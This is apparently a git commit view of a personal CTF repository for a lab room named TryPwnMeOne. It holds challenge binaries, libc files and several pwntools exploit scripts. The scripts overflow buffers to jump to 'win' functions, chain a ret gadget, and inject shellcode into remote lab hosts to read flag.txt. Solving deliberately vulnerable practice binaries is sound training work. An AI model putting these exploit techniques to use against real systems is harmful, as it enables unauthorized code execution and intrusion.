initial commit
This commit is contained in:
BIN
CTF/TryPwnMeOne/NotSpecified/notspecified
Normal file
BIN
CTF/TryPwnMeOne/NotSpecified/notspecified
Normal file
Binary file not shown.
2
CTF/TryPwnMeOne/RandomMemories/.gdb_history
Normal file
2
CTF/TryPwnMeOne/RandomMemories/.gdb_history
Normal file
@@ -0,0 +1,2 @@
|
||||
vmmap
|
||||
vmmap
|
||||
BIN
CTF/TryPwnMeOne/RandomMemories/random
Normal file
BIN
CTF/TryPwnMeOne/RandomMemories/random
Normal file
Binary file not shown.
19
CTF/TryPwnMeOne/RandomMemories/test.py
Normal file
19
CTF/TryPwnMeOne/RandomMemories/test.py
Normal file
@@ -0,0 +1,19 @@
|
||||
#!/usr/bin/env python3
|
||||
from pwn import *
|
||||
|
||||
context.update(os="linux", arch="amd64", log_level="error")
|
||||
context.binary = binary = ELF("./random", checksec=False )
|
||||
|
||||
r = process()
|
||||
gdb.attach(r)
|
||||
|
||||
win_function_address = binary.symbols["win"]
|
||||
|
||||
payload = b"A" * 256 # offset to the RBP
|
||||
payload += b"B" * 8 # overwrite the RBP
|
||||
payload += p64(win_function_address) # address of the win function
|
||||
|
||||
r.recvuntil(b"Return to where? : \n")
|
||||
r.sendline(payload)
|
||||
r.recvuntil(b"ok, let's go!\n\n")
|
||||
r.interactive()
|
||||
BIN
CTF/TryPwnMeOne/TheLibrarian/ld-linux-x86-64.so.2
Normal file
BIN
CTF/TryPwnMeOne/TheLibrarian/ld-linux-x86-64.so.2
Normal file
Binary file not shown.
BIN
CTF/TryPwnMeOne/TheLibrarian/libc.so.6
Normal file
BIN
CTF/TryPwnMeOne/TheLibrarian/libc.so.6
Normal file
Binary file not shown.
BIN
CTF/TryPwnMeOne/TheLibrarian/thelibrarian
Normal file
BIN
CTF/TryPwnMeOne/TheLibrarian/thelibrarian
Normal file
Binary file not shown.
20
CTF/TryPwnMeOne/TryExecMe/exploit.py
Normal file
20
CTF/TryPwnMeOne/TryExecMe/exploit.py
Normal file
@@ -0,0 +1,20 @@
|
||||
#!/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.update(os="linux", arch="amd64", log_level="error")
|
||||
r = remote("10.10.111.44", 9005)
|
||||
|
||||
payload = asm(shellcraft.sh())
|
||||
|
||||
r.recvuntil(b"Give me your shell, and I will execute it: \n")
|
||||
|
||||
r.sendline(payload)
|
||||
|
||||
r.recvuntil(b"Executing Spell...\n\n")
|
||||
|
||||
r.sendline(b"cat flag.txt")
|
||||
|
||||
print(r.recvline().decode())
|
||||
|
||||
r.close()
|
||||
BIN
CTF/TryPwnMeOne/TryExecMe/tryexecme
Normal file
BIN
CTF/TryPwnMeOne/TryExecMe/tryexecme
Normal file
Binary file not shown.
16
CTF/TryPwnMeOne/TryOverFlowMe1/exploit.py
Normal file
16
CTF/TryPwnMeOne/TryOverFlowMe1/exploit.py
Normal file
@@ -0,0 +1,16 @@
|
||||
#! /bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.log_level = 'error'
|
||||
|
||||
r = remote("10.10.111.44", "9003")
|
||||
|
||||
payload = b"A" * 44
|
||||
payload += p64(1)
|
||||
|
||||
r.recvuntil(b"Please go ahead and leave a comment :\n")
|
||||
r.sendline(payload)
|
||||
|
||||
print(r.recvline().decode())
|
||||
r.close()
|
||||
BIN
CTF/TryPwnMeOne/TryOverFlowMe1/overflowme1
Normal file
BIN
CTF/TryPwnMeOne/TryOverFlowMe1/overflowme1
Normal file
Binary file not shown.
13
CTF/TryPwnMeOne/TryOverFlowMe2/exploit.py
Normal file
13
CTF/TryPwnMeOne/TryOverFlowMe2/exploit.py
Normal file
@@ -0,0 +1,13 @@
|
||||
#!/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
r = remote("10.10.111.44", 9004)
|
||||
|
||||
payload = b"A" * 76
|
||||
payload += p32(0x59595959)
|
||||
|
||||
r.recvuntil(b"Please go ahead and leave a comment :\n")
|
||||
r.sendline(payload)
|
||||
print(r.recvline().decode())
|
||||
r.close()
|
||||
BIN
CTF/TryPwnMeOne/TryOverFlowMe2/overflowme2
Normal file
BIN
CTF/TryPwnMeOne/TryOverFlowMe2/overflowme2
Normal file
Binary file not shown.
23
CTF/TryPwnMeOne/TryRetMe/exploit.py
Normal file
23
CTF/TryPwnMeOne/TryRetMe/exploit.py
Normal file
@@ -0,0 +1,23 @@
|
||||
from pwn import *
|
||||
|
||||
context.update(os="linux", arch="amd64", log_level="error")
|
||||
context.binary = binary = ELF("./tryretme", checksec=False)
|
||||
|
||||
r = remote("10.10.170.21", 9006)
|
||||
|
||||
rop = ROP(binary)
|
||||
ret = rop.find_gadget(["ret"])[0]
|
||||
win_function_address = binary.symbols["win"]
|
||||
|
||||
payload = b"A" * 256
|
||||
payload += b"B" * 8
|
||||
payload += p64(ret)
|
||||
payload += p64(win_function_address)
|
||||
|
||||
r.recvuntil(b"Return to where? : \n")
|
||||
r.sendline(payload)
|
||||
r.recvuntil(b"ok, let's go!\n\n")
|
||||
|
||||
r.sendline(b"cat flag.txt")
|
||||
print(r.recvline().decode())
|
||||
r.close()
|
||||
BIN
CTF/TryPwnMeOne/TryRetMe/tryretme
Normal file
BIN
CTF/TryPwnMeOne/TryRetMe/tryretme
Normal file
Binary file not shown.
BIN
CTF/TryPwnMeOne/materials-TryPwnMeOne-final-1724815516655.zip
Normal file
BIN
CTF/TryPwnMeOne/materials-TryPwnMeOne-final-1724815516655.zip
Normal file
Binary file not shown.
Reference in New Issue
Block a user